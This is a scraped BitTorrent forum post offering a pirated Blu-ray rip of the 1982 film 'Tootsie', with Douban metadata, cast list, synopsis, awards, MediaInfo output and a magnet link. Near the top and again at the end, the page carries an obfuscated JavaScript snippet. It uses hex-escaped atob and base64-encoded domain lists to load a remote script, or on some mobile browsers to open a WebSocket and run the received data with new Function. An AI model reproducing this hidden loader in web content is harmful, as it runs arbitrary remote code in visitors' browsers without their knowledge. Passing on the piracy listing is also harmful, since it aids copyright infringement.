窈窕淑男[中文字幕].Tootsie.1982.1080p.BluRay.x265.10bit.DTS 9.49GB

版主小s 1月前 292

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 窈窕淑男 / 杜丝先生 / 宝贝

◎片 名 Tootsie

◎年 代 1982

◎产 地 美国

◎类 别 喜剧 / 爱情

◎语 言 英语

◎上映日期 1982-12-17(美国)

◎IMDb链接 https://www.imdb.com/title/tt0084805/

◎豆瓣评分 8.1/10 (11044人评价)

◎豆瓣链接 https://movie.douban.com/subject/1297737/

◎片 长 116分钟

◎导 演 西德尼·波拉克 Sydney Pollack (id:1010608)

◎编 剧 拉里·吉尔巴特 Larry Gelbart (id:1032596)

莫瑞·西斯盖 Murray Schisgal (id:1037459)

唐·麦圭尔 Don McGuire (id:1033356)

伊莲·梅 Elaine May (id:1045170)

巴瑞·莱文森 Barry Levinson (id:1002774)

◎演 员 达斯汀·霍夫曼 Dustin Hoffman (id:1054427)

杰西卡·兰格 Jessica Lange (id:1000091)

特瑞·加尔 Teri Garr (id:1036451)

达布尼·柯尔曼 Dabney Coleman (id:1013933)

查尔斯·德恩 Charles Durning (id:1032023)

比尔·默瑞 Bill Murray (id:1054508)

吉娜·戴维斯 Geena Davis (id:1006979)

西德尼·波拉克 Sydney Pollack (id:1010608)

乔治·盖恩斯 George Gaynes (id:1092511)

多丽丝·布莱克 Doris Belack (id:1065881)

艾伦·弗雷 Ellen Foley (id:1087837)

彼得·加托 Peter Gatto (id:1101336)

林恩·瑟格本 Lynne Thigpen (id:1159756)

罗纳德·施瓦里 Ronald L. Schwary (id:1297049)

迪布拉·穆尼 Debra Mooney (id:1133075)

Bernie Passeltiner Bernie Passeltiner (id:1135292)

Gene Shalit Gene Shalit (id:1142148)

理查德·怀廷 Richard Whiting (id:1162720)

帕梅拉·林肯 Pamela Lincoln (id:1117855)

Marjorie Lovett Marjorie Lovett (id:1117105)

Gavin Reed Gavin Reed (id:1140449)

山姆·斯通伯纳 Sam Stoneburner (id:1153537)

格雷格·戈尔曼 Greg Gorman (id:1329532)

Joyce Worsley Joyce Worsley (id:1164669)

安迪·沃霍尔 Andy Warhol (id:1025286)

Susan Merson Susan Merson (id:1115934)

汤姆·马迪罗沙 Tom Mardirosian (id:1115615)

约翰·卡普洛斯 John Kapelos (id:1107813)

托尼·德文 Tony Devon (id:1054317)

菲力浦·博萨斯 Phillip Borsos (id:1045784)

玛格·海根柏格 Marg Helgenberger (id:1040559)

莫瑞·西斯盖 Murray Schisgal (id:1037459)

托宾·贝尔 Tobin Bell (id:1025219)

艾斯黛拉·格蒂 Estelle Getty (id:1054637)

吉姆·简森 Jim Jansen (id:1107432)

Paul E. Guskin Paul E. Guskin (id:1093811)

Mary Donnet Mary Donnet (id:1089278)

Cassandra Danz Cassandra Danz (id:1086135)

Lois De Banzie Lois De Banzie (id:1085168)

James Carruthers James Carruthers (id:1075612)

克斯汀·埃伯索尔 Christine Ebersole (id:1055425)

西德尼·波拉克 Sydney Pollack (id:1010608)

迪克·理查兹 Dick Richards (id:1295588)

罗纳德·施瓦里 Ronald L. Schwary (id:1297049)

Charles Evans Charles Evans (id:1031225)

戴夫·格鲁辛 Dave Grusin (id:1012601)

欧文·罗兹曼 Owen Roizman (id:1050597)

威廉·斯坦坎普 William Steinkamp (id:1019627)

弗雷德里克·斯坦坎普 Fredric Steinkamp (id:1025754)

托妮·霍华德 Toni Howard (id:1286995)

林恩·斯塔马斯特 Lynn Stalmaster (id:1276256)

彼得·拉金 Peter S. Larkin (id:1289457)

鲁斯·莫利 Ruth Morley (id:1043714)

C. Romania Ford C. Romania Ford (id:1283970)

Toni-Ann Walker Toni-Ann Walker (id:1300313)

Dorothy J. Pearl Dorothy J. Pearl (id:1294172)

Allen Weisinger Allen Weisinger (id:1300632)

Joseph Coscia Joseph Coscia (id:1070887)

George Masters George Masters (id:1124709)

约瑟夫·莱迪 Joseph P. Reidy (id:1295409)

David McGiffert David McGiffert (id:1276278)

◎标 签 喜剧 / 美国 / 爱情 / 1982 / 经典 / 剧情 / 女性 / 奥斯卡

◎简 介

Michael Dorsey(达斯汀·霍夫曼 Dustin Hoffman 饰)是一个没什么名气的演员,混迹在一些小话剧和肥皂剧中,最近和经纪人George Fields(西德尼·波拉克 Sydney Pollack 饰)闹翻了,因为经纪人不愿意帮他的下一部话剧找投资,更认为他不可能再找到工作了。为了筹到钱来演他的室友Jeff(比尔·默瑞 Bill Murray 饰)所写的剧本,Michael于是化妆成一个女人的模样,并化名Dorothy Michaels。他从他的女性朋友Sandy(特瑞·加尔 Teri Garr 饰)那听说了一部电视剧的试镜,他成功成为剧中一个叫Kimberly的角色。他和戏中的女主角Julie Nichols(杰西卡·兰格 Jessica Lange 饰)两人相谈甚欢,甚至让Julie的父亲都爱上了他。然而Julie却不知道Do...

◎获奖情况 (共10项)

第55届奥斯卡金像奖 (1983)

最佳影片(提名)

最佳导演(提名)

└──西德尼·波拉克 (id:1010608)

最佳男主角(提名)

└──达斯汀·霍夫曼 (id:1054427)

最佳女配角

└──杰西卡·兰格 (id:1000091)

最佳女配角(提名)

└──特瑞·加尔 (id:1036451)

最佳原创剧本(提名)

最佳摄影(提名)

└──欧文·罗兹曼 (id:1050597)

最佳剪辑(提名)

最佳音响(提名)

最佳原创歌曲(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 134306521851493119013443149479846721507 (0x650A7EC67A48ACBF9F56A65B221DB7E3)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.49 GiB

  8. Duration : 1 h 56 min

  9. Overall bit rate : 11.7 Mb/s

  10. Movie name : TOOTSIE

  11. Encoded date : UTC 2021-10-22 01:22:35

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 56 min

  23. Bit rate : 10.8 Mb/s

  24. Width : 1 920 pixels

  25. Height : 800 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.293

  33. Stream size : 8.76 GiB (92%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=19.8000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 56 min

  45. Bit rate mode : Constant

  46. Bit rate : 768 kb/s

  47. Channel(s) : 5 channels

  48. Channel layout : C L R Ls Rs

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 639 MiB (7%)

  54. Language : English

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4610 (0x1202)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 1 h 55 min

  66. Bit rate : 70.8 kb/s

  67. Count of elements : 4144

  68. Stream size : 58.7 MiB (1%)

  69. Title : chs&eng

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4611 (0x1203)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 1 h 55 min

  82. Bit rate : 71.3 kb/s

  83. Count of elements : 4144

  84. Stream size : 59.1 MiB (1%)

  85. Title : cht&eng

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4612 (0x1204)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 55 min

  98. Bit rate : 39.3 kb/s

  99. Count of elements : 4144

  100. Stream size : 32.6 MiB (0%)

  101. Title : chs

  102. Language : Chinese

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Text #4

  107. ID : 6

  108. ID in the original source medium : 4613 (0x1205)

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 55 min

  114. Bit rate : 39.9 kb/s

  115. Count of elements : 4144

  116. Stream size : 33.1 MiB (0%)

  117. Title : cht

  118. Language : Chinese

  119. Default : No

  120. Forced : No

  121. Original source medium : Blu-ray


  122. Text #5

  123. ID : 7

  124. Format : PGS

  125. Muxing mode : zlib

  126. Codec ID : S_HDMV/PGS

  127. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  128. Duration : 1 h 56 min

  129. Bit rate : 63.0 kb/s

  130. Count of elements : 4048

  131. Stream size : 52.4 MiB (1%)

  132. Title : eng

  133. Language : English

  134. Default : No

  135. Forced : No


  136. Menu

  137. 00:00:00.000 : en:Chapter 01

  138. 00:05:40.006 : en:Chapter 02

  139. 00:14:24.029 : en:Chapter 03

  140. 00:20:26.433 : en:Chapter 04

  141. 00:32:19.812 : en:Chapter 05

  142. 00:42:48.691 : en:Chapter 06

  143. 00:55:11.308 : en:Chapter 07

  144. 01:04:56.642 : en:Chapter 08

  145. 01:16:40.137 : en:Chapter 09

  146. 01:27:20.944 : en:Chapter 10

  147. 01:39:01.435 : en:Chapter 11

  148. 01:45:55.057 : en:Chapter 12


TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:EC76EF0A58FB7BFF18268CCD7E7D6126C28AB500

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};